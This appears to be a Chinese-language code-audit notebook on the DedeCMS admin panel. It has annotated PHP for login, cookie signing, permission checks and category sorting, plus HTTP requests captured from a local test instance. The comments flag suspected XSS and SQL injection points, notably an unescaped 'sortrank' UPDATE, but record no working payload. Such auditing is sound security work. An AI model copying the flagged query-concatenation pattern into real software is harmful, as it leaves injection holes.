跳转
过程
第一次重定向到/dede/
php
<?php
/**
* 管理后台首页
*
* @version $Id: index.php 1 11:06 2010年7月13日Z tianya $
* @package DedeCMS.Administrator
* @copyright Copyright (c) 2007 - 2010, DesDev, Inc.
* @license http://help.dedecms.com/usersguide/license.html
* @link http://www.dedecms.com
*/
//preg_match 是 PHP 中用来做正则表达式匹配的函数
//$_SERVER 是PHP编程语言中预定义的超全局数组,属于服务器变量类别,用于存储与服务器环境及HTTP请求相关的信息。
//本地服务识别
//$_server['server_software'] #服务器标识的字串,兼容环境
//如果服务器标识捕获到php+多个内容加上后面的Development Server
//贪婪匹配.单个字符,*重复0次或者多次
//先匹配php,后面所有的全部吃掉,再回退看后面的条件,如果吐完是空匹配失败
//
//php
//dos?$要求匹配
if ( preg_match("#PHP (.*) Development Server#",$_SERVER['SERVER_SOFTWARE']) )
{
// 是 PHP 中用于获取当前请求的完整 URI 路径及查询字符
//如果路径是对的就跳转
//dirname取目录部分
//一个客户端获取,一个获取服务器执行本身目录
//混合容器$_SERVER
if ( $_SERVER['REQUEST_URI'] == dirname($_SERVER['SCRIPT_NAME']) )
{
//跳转
header('HTTP/1.1 301 Moved Permanently');
//重定向到url
header('Location:'.$_SERVER['REQUEST_URI'].'/');
}
}
//包含配置目录
//D:/dedecms/include/拼接
require_once(DEDEINC.'/dedetag.class.php');
//D:/dedecms/deta/admin/quickmenu-用户id.txt
$myIcoFile = DEDEDATA.'/admin/quickmenu-'.$cuserLogin->getUserID().'.txt';
//拼接
$defaultIcoFile = DEDEDATA.'/admin/quickmenu.txt';
//如果路径不存在,赋值默认
if(!file_exists($myIcoFile)) $myIcoFile = $defaultIcoFile;
//运行,这里
require(DEDEADMIN.'/inc/inc_menu_map.php');
//包含
//这里xss可能可以命令执行
include(DEDEADMIN.'/templets/index2.htm');
exit();
php
//这里
require_once(dirname(__FILE__)."/../config.php");
//设置
$maparray = array(1=>'文档相关',2=>'系统设置',3=>'必须辅助功能',4=>'网站更新操作',5=>'会员相关',6=>'基本模块插件');
//载入可发布频道
$addset = '';
//检测可用的内容模型
if($cfg_admin_channel = 'array' && count($admin_catalogs) > 0)
{
$admin_catalog = join(',', $admin_catalogs);
$dsql->SetQuery(" SELECT channeltype FROM `#@__arctype` WHERE id IN({$admin_catalog}) GROUP BY channeltype ");
}
else
{
$dsql->SetQuery(" SELECT channeltype FROM `#@__arctype` GROUP BY channeltype ");
}
$dsql->Execute();
$candoChannel = '';
while($row = $dsql->GetObject())
{
$candoChannel .= ($candoChannel=='' ? $row->channeltype : ','.$row->channeltype);
}
if(empty($candoChannel)) $candoChannel = 1;
$dsql->SetQuery("SELECT id,typename,addcon,mancon FROM `#@__channeltype` WHERE id IN({$candoChannel}) AND id<>-1 AND isshow=1 ORDER BY id ASC");
$dsql->Execute();
while($row = $dsql->GetObject())
{
$addset .= " <m:item name='{$row->typename}' ischannel='1' link='{$row->mancon}?channelid={$row->id}' linkadd='{$row->addcon}?channelid={$row->id}' channelid='{$row->id}' rank='' target='main' />\r\n";
}
$menusMain = "
php
//MD5加密截取
$_csrf_name = '_csrf_name_'.substr(md5(md5($cfg_cookie_encode)),0,8);
//获取cookkie
$_csrf_hash = GetCookie($_csrf_name);
//检查是否为空,如果不是空
if ( empty($_csrf_hash) )
{
//mt_rand()输出随机数
//uniqid 是 PHP 内置函数,意为 Unique Identifier(唯一标识符),用于生成基于当前微秒时间戳的字符串 ID
//时间戳.随机数
//MD5加密
$_csrf_hash = md5(uniqid(mt_rand(), TRUE));
if (strtoupper($_SERVER['REQUEST_METHOD']) !== 'POST')
{
//设置cookie
PutCookie($_csrf_name, $_csrf_hash, 7200, '/');
}
}
//设置
$_csrf = array(
'name' =>'_dede'.$_csrf_name,
'hash' => $_csrf_hash,
);
//检验用户登录状态
$cuserLogin = new userLogin();
//没有登录
if($cuserLogin->getUserID()==-1)
{
if ( preg_match("#PHP (.*) Development Server#",$_SERVER['SERVER_SOFTWARE']) )
{
//文件路径
$dirname = dirname($_SERVER['SCRIPT_NAME']);
//urlencode() 是 PHP 内置函数,用于将字符串转换为URL安全的编码格式,确保特殊字符在URL传输中不被误解析 。
header("location:{$dirname}/login.php?gotopage=".urlencode($dedeNowurl));
} else {
header("location:login.php?gotopage=".urlencode($dedeNowurl));
}
exit();
}
php
/**
* 获得当前的脚本网址
*
* @return string
*/
if ( ! function_exists('GetCurUrl'))
{
function GetCurUrl()
{
//不是空
//$_SERVER["REQUEST_URI"] 是 PHP 中用于获取当前请求的 URI 部分的超全局变量
//例如访问 https://example.com/test.php?id=1 时,其值为 /test.php?id=1
if(!empty($_SERVER["REQUEST_URI"]))
{
//获取
$scriptName = $_SERVER["REQUEST_URI"];
//赋值
$nowurl = $scriptName;
}
else
{
//
$scriptName = $_SERVER["PHP_SELF"];
if(empty($_SERVER["QUERY_STRING"]))
{
$nowurl = $scriptName;
}
else
{
$nowurl = $scriptName."?".$_SERVER["QUERY_STRING"];
}
}
//返回
return $nowurl;
}
}
php
//php5构造函数
function __construct($admindir='')
{
global $admin_path;
if(isset($_SESSION[$this->keepUserIDTag]))
{
$this->userID = $_SESSION[$this->keepUserIDTag];
$this->userType = $_SESSION[$this->keepUserTypeTag];
$this->userChannel = $_SESSION[$this->keepUserChannelTag];
$this->userName = $_SESSION[$this->keepUserNameTag];
$this->userPurview = $_SESSION[$this->keepUserPurviewTag];
$this->adminStyle = $_SESSION[$this->keepAdminStyleTag];
}
if($admindir!='')
{
$this->adminDir = $admindir;
}
else
{
$this->adminDir = $admin_path;
}
}
php
function PutCookie($key, $value, $kptime=0, $pa="/")
{
//在 PHP 中,global 是一个关键字,用于在函数内部访问或修改在函数外部定义的全局变量。
global $cfg_cookie_encode,$cfg_domain_cookie;
//设置cookie
setcookie($key, $value, time()+$kptime, $pa,$cfg_domain_cookie);
setcookie($key.'__ckMd5', substr(md5($cfg_cookie_encode.$value),0,16), time()+$kptime, $pa,$cfg_domain_cookie);
}
php
function GetCookie($key)
{
//在 PHP 中,global 是一个关键字,用于在函数内部访问或修改在函数外部定义的全局变量。
global $cfg_cookie_encode;
//isset 是 PHP 中用于检测变量是否已声明且值不为 NULL 的内置函数,返回布尔值 true 或 false。
//检查是否设置COOKIE,没有返回空
//变量 存在(非NULL)则返回 TRUE
if( !isset($_COOKIE[$key]) || !isset($_COOKIE[$key.'__ckMd5']) )
{
//
return '';
}
else
{
//截取16位MD5加密判断
if($_COOKIE[$key.'__ckMd5']!=substr(md5($cfg_cookie_encode.$_COOKIE[$key]),0,16))
{
return '';
}
else
{
//返回设置
return $_COOKIE[$key];
}
}
}后面是登录后面的逻辑了,配置信息,不看
php
//更新服务器
require_once (DEDEDATA.'/admin/config_update.php');
if ($dopost=='showad')
{
include('templets/login_ad.htm');
exit;
}登录
完全没有会话自动登录
php
//检测后台目录是否更名
$cururl = GetCurUrl();
//preg_match是PHP中用于执行正则表达式匹配的计算机函数
if(preg_match('/dede\/login/i',$cururl))
{
$redmsg = '<div class=\'safe-tips\'>您的管理目录的名称中包含默认名称dede,建议在FTP里把它修改为其它名称,那样会更安全!</div>';
}
else
{
$redmsg = '';
}
//登录检测
//explode() 是 PHP 中用于将字符串按指定分隔符拆分为数组的内置函数,俗称"字符串转数组"。
//拆分url路径为数组
$admindirs = explode('/',str_replace("\\",'/',dirname(__FILE__)));
//获取最后一个索引
$admindir = $admindirs[count($admindirs)-1];
if($dopost=='login')
{
//检查$validate是否为空
//不是去除空,全部小写
$validate = empty($validate) ? '' : strtolower(trim($validate));
//验证码返回,全部小写
$svali = strtolower(GetCkVdValue());
//验证码判断
//preg_match是PHP中用于执行正则表达式匹配的计算机函数
//这次 PHP session 就使用 Cookie
//匹配$safe_gdopen有字符6
if(($validate=='' || $validate != $svali) && preg_match("/6/",$safe_gdopen)){
//兼容
ResetVdValue();
//发送消息
ShowMsg('验证码不正确!','login.php',0,1000);
exit;
} else {
//注册一个类
//检查id并设置
//session dede_admin_id不是空
$cuserLogin = new userLogin($admindir);
//看密码
if(!empty($userid) && !empty($pwd))
{
//有过滤,但是直接拼接
$res = $cuserLogin->checkUser($userid,$pwd);
//success
//这里不可以查询出2条信息,dos风险
if($res==1)
{
//设置用户状态
$cuserLogin->keepUser();
if(!empty($gotopage))
{
ShowMsg('成功登录,正在转向管理管理主页!',$gotopage);
exit();
}
else
{
ShowMsg('成功登录,正在转向管理管理主页!',"index.php");
exit();
}
}
//error
else if($res==-1)
{
ResetVdValue();
ShowMsg('你的用户名不存在!','login.php',0,1000);
exit;
}
else
{
ResetVdValue();
ShowMsg('你的密码错误!','login.php',0,1000);
exit;
}
}
//password empty
else
{
ResetVdValue();
ShowMsg('用户和密码没填写完整!','login.php',0,1000);
exit;
}
}
}
include('templets/login.htm');
php
/**
* 保持用户的会话状态
*
* @access public
* @return int 成功返回 1 ,失败返回 -1
*/
function keepUser()
{
if($this->userID != '' && $this->userType != '')
{
global $admincachefile,$adminstyle;
if(empty($adminstyle)) $adminstyle = 'dedecms';
@session_register($this->keepUserIDTag);
$_SESSION[$this->keepUserIDTag] = $this->userID;
@session_register($this->keepUserTypeTag);
$_SESSION[$this->keepUserTypeTag] = $this->userType;
@session_register($this->keepUserChannelTag);
$_SESSION[$this->keepUserChannelTag] = $this->userChannel;
@session_register($this->keepUserNameTag);
$_SESSION[$this->keepUserNameTag] = $this->userName;
@session_register($this->keepUserPurviewTag);
$_SESSION[$this->keepUserPurviewTag] = $this->userPurview;
@session_register($this->keepAdminStyleTag);
$_SESSION[$this->keepAdminStyleTag] = $adminstyle;
PutCookie('DedeUserID', $this->userID, 3600 * 24, '/');
PutCookie('DedeLoginTime', time(), 3600 * 24, '/');
$this->ReWriteAdminChannel();
return 1;
}
else
{
return -1;
}
}
php
function checkUser($username, $userpwd)
{
global $dsql;
//只允许用户名和密码用0-9,a-z,A-Z,'@','_','.','-'这些字符
$this->userName = preg_replace("/[^0-9a-zA-Z_@!\.-]/", '', $username);
$this->userPwd = preg_replace("/[^0-9a-zA-Z_@!\.-]/", '', $userpwd);
$pwd = substr(md5($this->userPwd), 5, 20);
$dsql->SetQuery("SELECT admin.*,atype.purviews FROM `#@__admin` admin LEFT JOIN `#@__admintype` atype ON atype.rank=admin.usertype WHERE admin.userid LIKE '".$this->userName."' LIMIT 0,1");
$dsql->Execute();
$row = $dsql->GetObject();
if(!isset($row->pwd))
{
return -1;
}
else if($pwd!=$row->pwd)
{
return -2;
}
else
{
$loginip = GetIP();
$this->userID = $row->id;
$this->userType = $row->usertype;
$this->userChannel = $row->typeid;
$this->userName = $row->uname;
$this->userPurview = $row->purviews;
$inquery = "UPDATE `#@__admin` SET loginip='$loginip',logintime='".time()."' WHERE id='".$row->id."'";
$dsql->ExecuteNoneQuery($inquery);
$sql = "UPDATE #@__member SET logintime=".time().", loginip='$loginip' WHERE mid=".$row->id;
$dsql->ExecuteNoneQuery($sql);
return 1;
}
}
php
//php5构造函数
function __construct($admindir='')
{
//意为在当前函数或代码块中声明 $admin_path 为全局变量
global $admin_path;
//session dede_admin_id不是空
if(isset($_SESSION[$this->keepUserIDTag]))
{\
//设置
$this->userID = $_SESSION[$this->keepUserIDTag];
$this->userType = $_SESSION[$this->keepUserTypeTag];
$this->userChannel = $_SESSION[$this->keepUserChannelTag];
$this->userName = $_SESSION[$this->keepUserNameTag];
$this->userPurview = $_SESSION[$this->keepUserPurviewTag];
$this->adminStyle = $_SESSION[$this->keepAdminStyleTag];
}
if($admindir!='')
{
//设置
$this->adminDir = $admindir;
}
else
{
//存储
$this->adminDir = $admin_path;
}
}
function userLogin($admindir='')
{
$this->__construct($admindir);
}
php
function ShowMsg($msg, $gourl, $onlymsg=0, $limittime=0)
{
if(empty($GLOBALS['cfg_plus_dir'])) $GLOBALS['cfg_plus_dir'] = '..';
$htmlhead = "<html>\r\n<head>\r\n<title>DedeCMS提示信息</title>\r\n<meta http-equiv=\"Content-Type\" content=\"text/html; charset=gb2312\" />\r\n<meta name=\"viewport\" content=\"width=device-width, initial-scale=1, maximum-scale=1, user-scalable=no\">\r\n<meta name=\"renderer\" content=\"webkit\">\r\n<meta http-equiv=\"Cache-Control\" content=\"no-siteapp\" />";
$htmlhead .= "<base target='_self'/>\r\n<style>div{line-height:160%;}</style></head>\r\n<body leftmargin='0' topmargin='0' bgcolor='#FFFFFF'>".(isset($GLOBALS['ucsynlogin']) ? $GLOBALS['ucsynlogin'] : '')."\r\n<center>\r\n<script>\r\n";
$htmlfoot = "</script>\r\n</center>\r\n</body>\r\n</html>\r\n";
$litime = ($limittime==0 ? 1000 : $limittime);
$func = '';
if($gourl=='-1')
{
if($limittime==0) $litime = 5000;
$gourl = "javascript:history.go(-1);";
}
if($gourl=='' || $onlymsg==1)
{
$msg = "<script>alert(\"".str_replace("\"",""",$msg)."\");</script>";
}
else
{
//当网址为:close::objname 时, 关闭父框架的id=objname元素
if(preg_match('/close::/',$gourl))
{
$tgobj = trim(preg_replace('/close::/', '', $gourl));
$gourl = 'javascript:;';
$func .= "window.parent.document.getElementById('{$tgobj}').style.display='none';\r\n";
}
$func .= " var pgo=0;
function JumpUrl(){
if(pgo==0){ location='$gourl'; pgo=1; }
}\r\n";
$rmsg = $func;
$rmsg .= "document.write(\"<br /><div style='width:450px;padding:0px;border:1px solid #DADADA;'>";
$rmsg .= "<div style='padding:6px;font-size:12px;border-bottom:1px solid #DADADA;background:#DBEEBD url({$GLOBALS['cfg_plus_dir']}/img/wbg.gif)';'><b>DedeCMS 提示信息!</b></div>\");\r\n";
$rmsg .= "document.write(\"<div style='height:130px;font-size:10pt;background:#ffffff'><br />\");\r\n";
$rmsg .= "document.write(\"".str_replace("\"",""",$msg)."\");\r\n";
$rmsg .= "document.write(\"";
if($onlymsg==0)
{
if( $gourl != 'javascript:;' && $gourl != '')
{
$rmsg .= "<br /><a href='{$gourl}'>如果你的浏览器没反应,请点击这里...</a>";
$rmsg .= "<br/></div>\");\r\n";
$rmsg .= "setTimeout('JumpUrl()',$litime);";
}
else
{
$rmsg .= "<br/></div>\");\r\n";
}
}
else
{
$rmsg .= "<br/><br/></div>\");\r\n";
}
$msg = $htmlhead.$rmsg.$htmlfoot;
}
echo $msg;
}
php
/**
* PHP某些版本有Bug,不能在同一作用域中同时读session并改注销它,因此调用后需执行本函数
*
* @return void
*/
function ResetVdValue()
{
@session_start();
$_SESSION['securimage_code_value'] = '';
}
php
/**
* 获取验证码的session值
*
* @return string
*/
function GetCkVdValue()
{
//@错误抑制符号
//session_id() 是 PHP 中用于获取或设置当前会话 ID 的函数
//指定操作的对象,预插入id
@session_id($_COOKIE['PHPSESSID']);
//PHP 启动会话函数
//session_start() 是 PHP 中用于启动会话的函数,必须在任何输出之前调用,之后才能使用$_SESSION 存储用户数据
@session_start();
//$_SESSION['securimage_code_value'] 是 PHP 会话数组中用于存储 Securimage 验证码正确文本值
//如果验证码不是空返回验证码
return isset($_SESSION['securimage_code_value']) ? $_SESSION['securimage_code_value'] : '';
}
php
require_once(dirname(__FILE__)."/config.php");
require_once(DEDEINC.'/datalistcp.class.php');
CheckPurview('sys_Data');
$dopost = (empty($dopost))? '' : $dopost;
$pid = (empty($pid))? 0 : preg_replace('/[^0-9]/','',$pid);
if(empty($dopost)) $dopost = '';
//更新服务器
require_once (DEDEDATA.'/admin/config_update.php');
if ($dopost=='showad')
{
include('templets/login_ad.htm');
exit;
}网站栏目管理
php
GET /dede/catalog_main.php HTTP/1.1
Host: 127.0.0.1:855
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:151.0) Gecko/20100101 Firefox/151.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.9,zh-TW;q=0.8,zh-HK;q=0.7,en-US;q=0.6,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: http://127.0.0.1:855/dede/index_menu.php
Cookie: menuitems=1_1%2C2_1%2C4_1%2C6_1%2C3_1%2C5_1; PHPSESSID=ke3ts6rf54ka9vt48lhnq0lgs6; DedeUserID=1; DedeUserID__ckMd5=16f063afe3fbbf9a; DedeLoginTime=1781457755; DedeLoginTime__ckMd5=b8a421397291ed0b; _csrf_name_63248f8b=0e8472b16723a8058d49573501853992; _csrf_name_63248f8b__ckMd5=57590ee469f22461
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: iframe
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Priority: u=4
php
?php
/**
* 栏目管理
*
* @version $Id: catalog_main.php 1 14:31 2010年7月12日Z tianya $
* @package DedeCMS.Administrator
* @copyright Copyright (c) 2007 - 2010, DesDev, Inc.
* @license http://help.dedecms.com/usersguide/license.html
* @link http://www.dedecms.com
*/
//配置信息
require_once(dirname(__FILE__)."/config.php");
//
require_once(DEDEINC."/typeunit.class.admin.php");
$userChannel = $cuserLogin->getUserChannel();
include DedeInclude('templets/catalog_main.htm');
php
//管理缓存、管理员频道缓存
$cache1 = DEDEDATA.'/cache/inc_catalog_base.inc';
if(!file_exists($cache1)) UpDateCatCache();
$cacheFile = DEDEDATA.'/cache/admincat_'.$cuserLogin->userID.'.inc';
if(file_exists($cacheFile)) require_once($cacheFile);
//更新服务器
require_once (DEDEDATA.'/admin/config_update.php');
if(strlen($cfg_cookie_encode)<=10)
{
$chars='abcdefghigklmnopqrstuvwxwyABCDEFGHIGKLMNOPQRSTUVWXWY0123456789';
$hash='';
$length = rand(28,32);
$max = strlen($chars) - 1;
for($i = 0; $i < $length; $i++) {
$hash .= $chars[mt_rand(0, $max)];
}
$dsql->ExecuteNoneQuery("UPDATE `#@__sysconfig` SET `value`='{$hash}' WHERE varname='cfg_cookie_encode' ");
$configfile = DEDEDATA.'/config.cache.inc.php';
if(!is_writeable($configfile))
{
echo "配置文件'{$configfile}'不支持写入,无法修改系统配置参数!";
exit();
}
$fp = fopen($configfile,'w');
flock($fp,3);
fwrite($fp,"<"."?php\r\n");
$dsql->SetQuery("SELECT `varname`,`type`,`value`,`groupid` FROM `#@__sysconfig` ORDER BY aid ASC ");
$dsql->Execute();
while($row = $dsql->GetArray())
{
if($row['type']=='number')
{
if($row['value']=='') $row['value'] = 0;
fwrite($fp,"\${$row['varname']} = ".$row['value'].";\r\n");
}
else
{
fwrite($fp,"\${$row['varname']} = '".str_replace("'",'',$row['value'])."';\r\n");
}
}
fwrite($fp,"?".">");
fclose($fp);
}
php
<?php if(!defined('DEDEINC')) exit('Request Error!');
/**
* 栏目单元,主要用户管理后台管理处
*
* @version $Id: typeunit.class.admin.php 1 15:21 2010年7月5日Z tianya $
* @package DedeCMS.Libraries
* @copyright Copyright (c) 2007 - 2010, DesDev, Inc.
* @license http://help.dedecms.com/usersguide/license.html
* @link http://www.dedecms.com
*/
require_once(DEDEINC."/channelunit.func.php");
php
<?php if(!defined('DEDEINC')) exit("Request Error!");
/**
* 栏目小助手,本文件仅做一个映射
*
* @version $Id: channelunit.func.php 2 16:46 2010年7月6日Z tianya $
* @package DedeCMS.Helpers
* @copyright Copyright (c) 2007 - 2010, DesDev, Inc.
* @license http://help.dedecms.com/usersguide/license.html
* @link http://www.dedecms.com
*/
if(!isset($cfg_mainsite)) extract($GLOBALS, EXTR_SKIP);
global $PubFields,$pTypeArrays,$idArrary,$envs,$v1,$v2;
$pTypeArrays = $idArrary = $PubFields = $envs = array();
$PubFields['phpurl'] = $cfg_phpurl;
$PubFields['indexurl'] = $cfg_mainsite.$cfg_indexurl;
$PubFields['templeturl'] = $cfg_templeturl;
$PubFields['memberurl'] = $cfg_memberurl;
$PubFields['specurl'] = $cfg_specialurl;
$PubFields['indexname'] = $cfg_indexname;
$PubFields['templetdef'] = $cfg_templets_dir.'/'.$cfg_df_style;
$envs['typeid'] = 0;
$envs['reid'] = 0;
$envs['aid'] = 0;
$envs['keyword'] = '';
$envs['idlist'] = '';
helper('channelunit');更新排序(xss,无,sql无)
php
POST /dede/catalog_do.php?dopost=upRankAll HTTP/1.1
Host: 127.0.0.1:855
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:151.0) Gecko/20100101 Firefox/151.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.9,zh-TW;q=0.8,zh-HK;q=0.7,en-US;q=0.6,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded
Content-Length: 133
Origin: http://127.0.0.1:855
Connection: keep-alive
Referer: http://127.0.0.1:855/dede/catalog_main.php
Cookie: menuitems=1_1%2C2_1%2C4_1%2C6_1%2C3_1%2C5_1; PHPSESSID=ke3ts6rf54ka9vt48lhnq0lgs6; DedeUserID=1; DedeUserID__ckMd5=16f063afe3fbbf9a; DedeLoginTime=1781457755; DedeLoginTime__ckMd5=b8a421397291ed0b; _csrf_name_63248f8b=0e8472b16723a8058d49573501853992; _csrf_name_63248f8b__ckMd5=57590ee469f22461; lastCid=1; lastCid__ckMd5=16f063afe3fbbf9a
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: iframe
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Priority: u=4
sortrank1=10&sortrank2=10&sortrank3=10&sortrank4=10&sortrank5=10&sortrank6=10&sortrank12=10&sortrank13=10&sortrank14=10&sortrank17=12调试(可能注入)
php
$cid = empty($cid) ? 0 : intval($cid);
$unittype = empty($unittype) ? 0 : intval($unittype);
$channelid = empty($channelid) ? 0 : intval($channelid);
php
//调试来历
else if($dopost=="upRankAll")
{
//检查权限许可
CheckPurview('t_Edit');
//调试才可以
//#@__arctype:DedeCMS 的表前缀占位符,实际对应数据库中的 dede_arctype 表(存储网站栏目/分类信息)。
//SELECT id:仅查询栏目的唯一标识符(ID)。
//ORDER BY id DESC:将结果按 ID 降序排列(从大到小),确保第一条数据是最新创建的栏目。
//查询
$row = $dsql->GetOne("SELECT id FROM #@__arctype ORDER BY id DESC");
//这里看有没有信息
if(is_array($row))
{
//查询id 键记录
//看这里可不可控
$maxID = $row['id'];
//循环
for($i=1;$i<=$maxID;$i++)
{
//如果'sortrank'.$i不是空
//注册全局变量
if(isset(${'sortrank'.$i}))
{
//显示
//#@__arctype前缀占位符
//更新条目
//更新权重
//不存在注入,这里更新
//可能注入
//UPDATE #@__arctype SET sortrank='".(${'sortrank'.$i}).取出字段
$dsql->ExecuteNoneQuery("UPDATE #@__arctype SET sortrank='".(${'sortrank'.$i})."' WHERE id='{$i}';");
}
}
}
//更新条目
UpDateCatCache();
ShowMsg("操作成功,正在返回...","catalog_main.php");
exit();
}位int
php
/**
* 更新栏目缓存
*
* @access public
* @return void
*/
function UpDateCatCache()
{
//global:这是PHP语言里的关键字,作用是让函数内部的变量可以访问到全局作用域里的同名变量,或者在函数里声明的变量直接成为全局变量。
global $dsql, $cfg_multi_site, $cache1, $cacheFile, $cuserLogin;
$cache2 = DEDEDATA.'/cache/channelsonlist.inc';
$cache3 = DEDEDATA.'/cache/channeltoplist.inc';
//查询
$dsql->SetQuery("SELECT id,reid,channeltype,issend,typename FROM `#@__arctype`");
$dsql->Execute();
//打开文$cache1文件
$fp1 = fopen($cache1,'w');
$phph = '?';
$fp1Header = "<{$phph}php\r\nglobal \$cfg_Cs;\r\n\$cfg_Cs=array();\r\n";
//这里
//写入文件,$fp1 = fopen($cache1,'w');,$fp1Header = "<{$phph}php\r\nglobal \$cfg_Cs;\r\n\$cfg_Cs=array();\r\n";
//写入
fwrite($fp1,$fp1Header);
//
while($row=$dsql->GetObject())
{
// 将typename缓存起来
$row->typename = base64_encode($row->typename);
//变量存储
fwrite($fp1,"\$cfg_Cs[{$row->id}]=array({$row->reid},{$row->channeltype},{$row->issend},'{$row->typename}');\r\n");
}
fwrite($fp1, "{$phph}>");
fclose($fp1);
$cuserLogin->ReWriteAdminChannel();
@unlink($cache2);
@unlink($cache3);
}
php
function CheckPurview($n)
{
//判断现在有没有特殊符号
//没有true的话
if(!TestPurview($n))
{
ShowMsg("对不起,你没有权限执行此操作!<br/><br/><a href='javascript:history.go(-1);'>点击此返回上一页>></a>",'javascript:;');
exit();
}
}
php
/**
* 检验用户是否有权使用某功能,这个函数是一个回值函数
* CheckPurview函数只是对他回值的一个处理过程
*
* @access public
* @param string $n 功能名称
* @return mix 如果具有则返回TRUE
*/
function TestPurview($n)
{
$rs = FALSE;
//获取$userPurview
//$GLOBALS['cuserLogin'] 是 PHP 语言中用于访问全局作用域下名为 //cuserLogin$GLOBALS['cuserLogin'] 是 PHP 语言中用于访问全局作用域下名为 cuserLogin的变量的方式
//登陆例子
//取出已经实例好的对象
$purview = $GLOBALS['cuserLogin']->getPurview();
//preg_match 是 PHP 中用于执行单次正则表达式匹配的函数
//找到匹配
if(preg_match('/admin_AllowAll/i',$purview))
{
return TRUE;
}
//true
if($n=='')
{
return TRUE;
}
if(!isset($GLOBALS['groupRanks']))
{
//explode() 主要是 PHP 编程中用来把字符串切分成数组的函数
//切割$userPurview,赋值
$GLOBALS['groupRanks'] = explode(' ',$purview);
}
//切割符号
$ns = explode(',',$n);
//foreach 是编程中用于遍历数组或集合的循环语句
foreach($ns as $n)
{
//只要找到一个匹配的权限,即可认为用户有权访问此页面
//如果没有
if($n=='')
{
//继续
continue;
}
//$GLOBALS['groupRanks']角色拥有的权限合集
if(in_array($n,$GLOBALS['groupRanks']))
{
//设置,退出循环
$rs = TRUE; break;
}
}
//返回
return $rs;
}
php
var $userPurview = '';
function getPurview()
{
return $this->userPurview;
}实验失败
预览(注入目前没有)
php
GET /plus/list.php?tid=2 HTTP/1.1
Host: 127.0.0.1:855
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:151.0) Gecko/20100101 Firefox/151.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.9,zh-TW;q=0.8,zh-HK;q=0.7,en-US;q=0.6,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: http://127.0.0.1:855/dede/catalog_main.php
Cookie: DedeUserID=1; DedeUserID__ckMd5=16f063afe3fbbf9a; DedeLoginTime=1781510727; DedeLoginTime__ckMd5=6a08ab93e9b82d93; lastCid=17; lastCid__ckMd5=c3c0697254656180; PHPSESSID=fkd4nmanosng3l7lnbsjmi6a0l
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Priority: u=0, i
php
GET /plus/qrcode.php?id=2&type=list HTTP/1.1
Host: 127.0.0.1:855
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:151.0) Gecko/20100101 Firefox/151.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.9,zh-TW;q=0.8,zh-HK;q=0.7,en-US;q=0.6,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: http://127.0.0.1:855/plus/list.php?tid=2
Cookie: DedeUserID=1; DedeUserID__ckMd5=16f063afe3fbbf9a; DedeLoginTime=1781510727; DedeLoginTime__ckMd5=6a08ab93e9b82d93; lastCid=17; lastCid__ckMd5=c3c0697254656180; PHPSESSID=fkd4nmanosng3l7lnbsjmi6a0l
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: iframe
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Priority: u=4
php
require_once(dirname(__FILE__)."/../include/common.inc.php");
//$t1 = ExecTime();
//判断是不是数字,是不是空(没有注入了),返回
$tid = (isset($tid) && is_numeric($tid) ? $tid : 0);
//调试,看有没有频道标识符
$channelid = (isset($channelid) && is_numeric($channelid) ? $channelid : 0);
//如果都没有
if($tid==0 && $channelid==0) die(" Request Error! ");
//preg_replace 是 PHP 中用来执行正则表达式搜索和替换的内置函数,能帮你批量处理字符串里的特定模式内容 。
//判断总计结果是否为空
//正则匹配,转化整数
if(isset($TotalResult)) $TotalResult = intval(preg_replace("/[^\d]/", '', $TotalResult));
//如果指定了内容模型ID但没有指定栏目ID,那么自动获得为这个内容模型的第一个顶级栏目作为频道默认栏目
//如果没有频道标识符,tid是空
if(!empty($channelid) && empty($tid))
{
//默认排序
//几乎没有注入
$tinfos = $dsql->GetOne("SELECT tp.id,ch.issystem FROM `#@__arctype` tp LEFT JOIN `#@__channeltype` ch ON ch.id=tp.channeltype WHERE tp.channeltype='$channelid' And tp.reid=0 order by sortrank asc");
//如果是空
if(!is_array($tinfos)) die(" No catalogs in the channel! ");
//赋值
$tid = $tinfos['id'];
}
else
{
//排序
$tinfos = $dsql->GetOne("SELECT ch.issystem FROM `#@__arctype` tp LEFT JOIN `#@__channeltype` ch ON ch.id=tp.channeltype WHERE tp.id='$tid' ");
}
php
//如果是-1
//信息/新闻(调试)
if($tinfos['issystem']==-1)
{
$nativeplace = ( (empty($nativeplace) || !is_numeric($nativeplace)) ? 0 : $nativeplace );
$infotype = ( (empty($infotype) || !is_numeric($infotype)) ? 0 : $infotype );
//过滤字段
//一般来自前端
//信息设置
if(!empty($keyword)) $keyword = FilterSearch($keyword);
$cArr = array();
if(!empty($nativeplace)) $cArr['nativeplace'] = $nativeplace;
if(!empty($infotype)) $cArr['infotype'] = $infotype;
if(!empty($keyword)) $cArr['keyword'] = $keyword;
//这里
include(DEDEINC."/arc.sglistview.class.php");
$lv = new SgListView($tid,$cArr);
} else {
include(DEDEINC."/arc.listview.class.php");
//查看栏目信息
$lv = new ListView($tid);
//对设置了会员级别的栏目进行处理
//判断
if(isset($lv->Fields['corank']) && $lv->Fields['corank'] > 0)
{
//
